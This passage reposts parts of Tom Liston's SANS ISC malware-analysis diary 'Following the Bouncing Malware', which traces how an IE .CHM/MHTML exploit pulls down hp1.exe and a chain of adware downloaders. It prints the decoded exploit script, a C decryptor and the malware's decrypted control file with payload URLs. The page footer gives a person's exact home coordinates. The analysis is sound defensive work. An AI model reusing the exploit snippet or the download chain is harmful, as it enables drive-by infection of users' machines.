\u005c\u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0067\u002c\u006c
\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066
\u002e\u0073\u0075\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0030
\u002c\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072
\u0065\u0066\u002e\u0069\u006e\u0064\u0065\u0078\u004f\u0066\u0028\u0027
\u0068\u0070\u0031\u002e\u0068\u0074\u006d\u0027\u0029\u0029\u0029\u0029
\u003b\u000d\u000a\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e
\u000d\u000a\u000d\u000a')[/script]
Once again, this isn’t difficult to decode, and results in:
<textarea id="code" style="display:none;">
[object data="&#109;s-its:mhtml:file://C:\foo.mht!${PATH}/HP1.CHM::/hp1.htm"\
type="text/x-scriptlet"][/object]
</textarea>
[script language="javascript"]
document.write(code.value.replace(/\${PATH}/g,location.href.substring\
(0,location.href.indexOf('hp1.htm'))));
[/script]
Another .chm exploit that will eventually result in the download and execution of a file called hp1.exe.
Here we go again... and trust me, hp1.exe is a real piece of work.
Stay tuned for Part III...
Note: When I first started writing this up, I was completely unaware of how deeply down the rabbit hole it would take me. I honestly believed that it would only be a fairly long diary entry... then two fairly long diary entries... and now it is obvious that we’re heading into three parts at the very least. I’ll try to get Part III (and any other remaining posts) up more quickly.
------------------------------------------------------------------------
 


Tom Liston´s Following the Bouncing Malware -  Part III

Note: Most of the links in the following are not "clickable" on purpose. Think of it as a warning...

Before we begin our tumble down the rabbit hole once more, just a few brief words:

For those of you who have been following this little excursion: thank you for your patience. It’s probably difficult to completely understand the amount of time that each of these little essays takes to research and write. While I’ve been working on this particular installment, there were also the distractions of family, job, the daily “stuff” coming in at the SANS ISC, MS04-028, GDIScan, turning the ISC into the GDIScan helpdesk (sorry gang!), windsurfing the halls at NS2004 in Vegas, etc..., etc... You have my sincere apologies for the wait, as well as my fervent hope that it was worth it.

With that out of the way, why don’t we “warm up” by quickly retracing the path we’ve already trod? Perhaps now would be a good time to take a bathroom break and grab a fresh container of your favorite adult beverage, ‘cause once this caravan rolls, we ain’t stoppin’. Go on, I’ll wait...

Ready? Good. Let’s go!

In the beginning, there was Joe Average. And Joe didst buy himself a computer and conneceth it to the Internet. And with his computer, Joe did surfeth, and readeth email, and playeth many games. And Joe looked upon the Internet, and it was Good.

But while Joe did possess knowledge of the Internet Good, he did not understand that Evil too lived on the Internet. And he patcheth not.

Then one day, Joe didst unknowingly go to a Bad Place, and much Evil befell his shiny new computer.

How Evil? Very, VERY Evil:


From Follow The Bouncing Malware, Part I
(http://isc.sans.org/diary.php?date=2004-07-23 ):

1) Joe's homepage had been changed. It is now set to:
http://default-homepage-network.com/start.cgi?new-hkcu

2) Joe’s default search page has been set to:
http://server224.smartbotpro.net/7search/?new-hkcu

3) Search assist has been turned off.

4) "TV Media Display" has been installed on Joe's machine.

5) addictivetechnologies.net had graced Joe's machine with a file identified by AV software as Win32/TrojanDownloader.Rameh.C.

And, from Follow The Bouncing Malware, Part II
(http://isc.sans.org/diary.php?date=2004-08-23 ):

6) Joe’s computer, at the behest of the Addictive Technologies malware, downloaded “instructions” from F1Organizer.com

7) Following those instructions, new “Favorites” were added to Joe’s browser, and two new “gifts” (SplWbr.dll and ezbdlLs.dll) were installed on his computer.

8) The installation of SplWbr.dll dumped an “Ad Destroyer and Virtual Bouncer” from SpyWare Labs, Inc. and “TopRebates.com AutoTrack software” onto Joe’s computer.

9) The installation of ezbdlLs.dll dropped a “Utility for downloading files and upgrading software” from “ABetterInternet”, a utility to “Make Your Internet Browsing Simple, Exciting, and Personal” from the fine folks at “ezULA”, and an affiliate ID hijacker called SAHAgent onto Joe’s PC.

10) Finally, the file hp1.exe was downloaded and executed via a .CHM exploit.

That’s where we stopped last time, with my promise that the file “hp1.exe” was “a real piece of work.”

So... let’s take a look at hp1.exe.

The file hp1.exe contains 49,152 bytes o’ Visual Basic goodness (guffaw). The file’s version information claims that it was created by a company called “df”, with an internal name of “bigs104”. Launching this beastie begins bringing down a veritable rain of malware on a machine. Sit back and try to keep up as we follow the bouncing malware:

First, it contacts "http://mmm.roings.com/bundle.php?aff=bigs104" and downloads 1449 bytes of some sort of data:
388
{}{}{}wrds======ckkcha*gki+waevgl9uxwaevgl*}elkk*gki+waevgl9tx
}elkk*gki+v+w|+.9txv`w*}elkk*gki+9txwaevgl*iwj*gki+vawqhpw*ewt9ux
eqpk*waevgl*iwj*gki+vawqhpw*ewt9uxc*iwj*gki+9ux
ekhwaevgl*gki+ekhgki+waevgl9uqav}xwaevgl*ekh*gki+ekhgki+waevgl9uqav}x
ehhplasaf*gki+waevgl9uxsaf*ewo*gki+saf9uxkravpqva*gki+`+waevgl9Oa}skv`wx
gkjpajp*kravpqva*gki+`+waevgl9Oa}skv`wxiw|ih*mjbkwtega*gki+lkia+`kc9uosx
mjbkwtega*gki+lkia+`kc9uosxwaevgl*japwgeta*gki+jw+waevgl9uqav}x
japwgeta*gki+jw+waevgl9uqav}xehpermwpe*gki+saf+vawqhpw9ux
waevgl*h}gkw*gki+`abeqhp*ewt9uqav}xh}gkw*gki+waevgl*ewt9uqav}x
waevgl*aevplhmjo*jap+pvego9uxwaevgl*hkkowievp*gki+t+waevgl9up
{}{}{}doms======faewp}wtkvpeh*2|*pk9995xxxgavmeh~*gki9996xxx
`vmjoi}*gki9995
{}{}{}ver======17
{}{}{}pay======yes
{}{}{}ip======aa.bbb.cc.dd (note: this was Joe’s machine’s IP address)
{}{}{}phases======`veckjfehh~9995xxxgvegow9996xx
mb$}kq$qwa$plmw$wmpa9995
{}{}{}sewers======wa|$bkv$bvaa9995xxxwa|9996xxxikva$wa|$bkv$ia9995
12
{}{}{}outers======
175
xxxxxi}a|a999lppt>++fmjw6*ia`me)ikpkv*jap+wkbp+hke`w+999i}a|a999999EHHx
JQHHxxxxxerepev999lppt>++sss*erepevvawkqvgaw*gki+`mwp+ewp[0[ii*a|a999ewp[0
[ii*a|a999ewp[0[ii*a|a999QWxAFxEQxGExCFxxxxx
a6cmra999lppt>++fmjw6*ia`me)ikpkv*jap+wkbp+Ia`meIkpkv61*a|a999Ia`meIkpkv61*
a|a999Ia`meIkpkv61*a|a999QWxGExxxxx
qjwpeh999lppt>++qtw*vkmjcw*gki+wkbp+qjwpehh*a|a999qmjwpehhav999999EHHx
JQHH
f
{}{}{}reg======
5c
xxxxxkg|5<999lppt>++fmjw6*ia`me)ikpkv*jap+wkbp+ii64*kg|999ii64*kg|999ii64*kg|
999EHHxQWxGExAF
6
{}{}{}
0
(Note: the data has been reformatted to display better in the Diary.)

Well, what the heck does all of that mean? Hmmm... it’s obviously a “generated on the fly” data file, because the file contained, in plain-text, the IP address of the NAT firewall that Joe’s machine was behind. It also appears to have been “encrypted” in some manner.

Given some time, and several pieces of paper wadded up and thrown at the cat in frustration, your intrepid author cracked the code, and wrote the following program to decrypt the data:
#include <stdio.h>

int main(int ac, char **av) {
FILE *in, * out;
char buffer[80], *c, val;
int cont = 1;

if(ac != 2){puts("Usage: df_decrypt filename"); return 1;}
if((in = fopen(av[1], "r")) == NULL){puts("Cannot open input file."); return 2;}
if(!(out = fopen("output.txt", "w"))){puts("Cannot open output file."); return 3;}
while(cont){
if(fgets(buffer, sizeof(buffer), in)){
c = buffer;
while(*c){
if(*c != '\n'){
val = *c & 7;
if(val < 4) *c = *c + 4;
else *c = *c - 4;
}
c++;
}
fputs(buffer, out);
} else cont = 0;
}
fclose(in); fclose(out);
return 0;
}
Filling the decrypted data back into the file alongside any original data that is obviously “keywords” results in the following unencrypted file:
388
{}{}{}wrds======google.com/search=q|search.yahoo.com/search=p|
yahoo.com/r/sx/*=p|rds.yahoo.com/=p|search.msn.com/results.asp=q|
auto.search.msn.com/results.asp=q|g.msn.com/=q|aolsearch.com/aolcom/search=query|
search.aol.com/aolcom/search=query|alltheweb.com/search=q|web.ask.com/web=q|
overture.com/d/search=Keywords|content.overture.com/d/search=Keywords|
msxml.infospace.com/home/dog=qkw|infospace.com/home/dog=qkw|
search.netscape.com/ns/search=query|netscape.com/ns/search=query|
altavista.com/web/results=q|search.lycos.com/default.asp=query|
lycos.com/search.asp=query|search.earthlink.net/track=q|
search.looksmart.com/p/search=qt
{}{}{}doms====== beastysportal.6x.to===1|||cerialz.com===2|||drinkmy.com===1
{}{}{}ver======17
{}{}{}pay======yes
{}{}{}ip======aa.bbb.cc.dd (note: this was Joe’s machine’s IP address)
{}{}{}phases====== dragonballz===1|||cracks===2||if you use this site===1
{}{}{}sewers====== sex for free===1|||sex===2|||more sex for me===1
12
{}{}{}outers======
175
|||||myexe===http://bins2.media-motor.net/soft/loads/
===myexe======ALL|NULL
|||||avatar===http://www.avatarresources.com/dist/ast_4_mm.exe
===ast_4_mm.exe===ast_4_mm.exe===US|EB|AU|CA|GB
|||||e2give===http://bins2.media-motor.net/soft/MediaMotor25.exe
===MediaMotor25.exe===MediaMotor25.exe===US|CA
|||||unstal===http://ups.roings.com/soft/unstall.exe
===uinstaller======ALL|NULL
f
{}{}{}reg======
5c
|||||ocx18===http://bins2.media-motor.net/soft/mm20.ocx
===mm20.ocx===mm20.ocx===ALL|US|CA|EB
6
{}{}{}
0
After downloading this “control data” file, Joe’s computer then contacts "http://www.mastermind.com/a?l=PeAyF1sgrZYw&i=aaa.bbb.ccc.ddd" on TCP port 8010 (where aaa.bbb.ccc.ddd is Joe’s computer’s IP address) and has three lines of data returned: “2”, “US”, “0”.

This ties in with what appear to be “country codes” found within various portions of the unencrypted data file. It appears that the malware will react differently depending on the country where the infected machine is located. The script at www.mastermind.com takes the IP address and returns a country code. The other two codes (“2” and “0”) appear to control different aspects of the malware’s behavior.

Immediately upon receiving the “US” country code from mastermind.com, Joe’s computer contacts "http://bins2.media-motor.net/soft/mm20.ocx" and downloads, installs, and registers this 61,440 byte OCX. Examining this file, it appears to be an OCX version of hp1.exe. It contains many of the same strings, and appears to offer the same functionality. I would assume that it acts as a resident version of hp1.exe.

Next, hp1.exe contacts "http://bins2.media-motor.net/soft/loads/8-24.exe" and downloads a 40,960 byte executable. The “8-24” name is derived from the date at the time of the download (August 24th).

Based upon the “marching orders” within the unencrypted datafile, Joe’s computer now contacts "http://www.avatarresources.com/dist/ast_4_mm.exe" and downloads a 129,152 byte executable. It then contacts "http://bins2.media-motor.net/soft/MediaMotor25.exe" and downloads a 9,056 byte executable.

Both of these files are launched, and MediaMotor25.exe immediately initiates a download from "http://64.7.220.98/downloads/IeBHOs.dll" which is a 129,536 byte long BHO (Browser Helper Object) that is installed into (duh) IE (Internet Explorer). IeBHOs.dll is a known component of adware from “e2give.” Because it is installed into IE and becomes, essentially, part of the browser, it is in the perfect position to monitor the URLs being “surfed” and to change Joe's browser's requests when going to specific sites in order to “direct” affiliate commissions to e2give. According to the e2give.com website, “e2give will donate a portion of each qualifying purchase to the e2give charities network.” This, of course, makes it perfectly fine for them to install their software onto Joe’s machine without his permission. (Yes, that was sarcasm.)

The ast_4_mm.exe file from avatarresources.com is a Wise installation executable. As it installs, it phones home to let the fine folks at avatarresources know that it has found a new place to live:

"http://www.avatarresources.com/count/count.php?&mm2_us&mm2_new_nocpr"

The Wise installation has it’s own downloading engine which contacts the interestingly named “www.wenksdisdkjeilsow.com” and accesses the URL “http:// www.wenksdisdkjeilsow.com/config/?v=5&n=mm2&i=” which, despite the fact that it generates errors, sends back more configuration information (sheesh guys, if you’re going to go through all the trouble to set this stuff up, at least set the permissions correctly on your scripts...)
566
<br />
Warning: SAFE MODE Restriction in effect.
The script whose uid is 500 is not allowed to access
/usr/local/psa/home/vhosts/wenksdisdkjeilsow.com/httpdocs
/config/log owned by uid 10011 in/usr/local/psa/home
/vhosts/wenksdisdkjeilsow.com/httpdocs/config/index.php
on line 24<br /><br />
Warning: fopen("/usr/local/psa/home/vhosts
/wenksdisdkjeilsow.com/httpdocs/config/log", "a") -
Inappropriate ioctl for device in /usr/local/psa
/home/vhosts/wenksdisdkjeilsow.com/httpdocs
/config/index.php on line 24<br />
<br />
Warning: fputs(): supplied argument is not a
valid File-Handle resource in /usr/local/psa
/home/vhosts/wenksdisdkjeilsow.com/httpdocs/config/index.php
on line 25<br />
<br />
Warning: fclose(): supplied argument is not a
valid File-Handle resource in /usr/local/psa
/home/vhosts/wenksdisdkjeilsow.com/httpdocs/config/index.php
on line 26<br />
[URLS]
2,http://tt2.avres.net/tt/remove_spyware.exe
2,http://tt2.avres.net/tt/curgsi.exe
3,http://searchlocate.com/toolbar/searchlocate.exe

[VERSION]
5

[PROGRAM URL]
http://www.wenksdisdkjeilsow.com/files/ast_5_main.exe

[ID]
ArKJ9t9HzRnbf0GineJhq

[PRIORITY]
1,http://tt2.avres.net/tt/cpr_mm2.exe
2,http://tt2.avres.net/tt/ab1.exe
3,http://tt2.avres.net/tt/tvm_bundle.exe
4,http://tt2.avres.net/tt/cpr_mm2.exe

0
That’s just really BAD programming: you MUST check that those handles returned are valid when you open a file... dang... that’s Programming 101 Stuff. But I digress...

Hey! Look there! I see more URLs pointing to executable files. Gee, I wonder what’ll happen...?

Anyway... we now manage to round out the list of files that was in our original encrypted configuration data, and Joe’s machine goes out and grabs a file from "http://ups.roings.com/soft/unstall.exe." This actually does appear to be some sort of uninstall program, written in Visual Basic, and weighing in at 45,056 bytes. It only seems targeted at the files directly installed by the hp1.exe file, though.

But, lest we forget, we still have a Wise install running in the background. And, you guessed it, in “PRIORITY” order, it downloads:

"http://tt2.avres.net/tt/cpr_mm2.exe" (270,415 bytes)
"http://tt2.avres.net/tt/ab1.exe" (500,869 bytes)
"http://tt2.avres.net/tt/tvm_bundle.exe" (53,738 bytes)
"http://tt2.avres.net/tt/cpr_mm2.exe" (270,415 bytes - ????????)

Yes, you read that correctly. It DID download the exact same file twice. (It must be a personality trait of the morally bankrupt that they can be both clever and inane at the same time. The authors of these programs really do pull off some amazing stuff... but then they follow that up almost immediately by doing some amazingly STUPID stuff. Consistency guys, consistency...)
 
Link to Amateur Radio "Top Listed" Site
My Berkeley Open Infrastructure for Network Computing (BOINC) Stats
Scott Gillis (N3UJJ) Page Counter
 

My QTH
(Home Location)

Grid Square: FM18rv78rh

CQ Zone 5
I.T.U Zone 8

Latitude: 38.90970253171965
Longitude: -76.51880979537964

Latitude: N38° 54' 34''
Longitude: W76° 31' 7''

Latitude: 38.910°
Longitude: -76.519°

Find Your Longitude and Latitude here

Footer template last updated: October 6, 2013 10:12
Toyota of Waldorf Group Skydive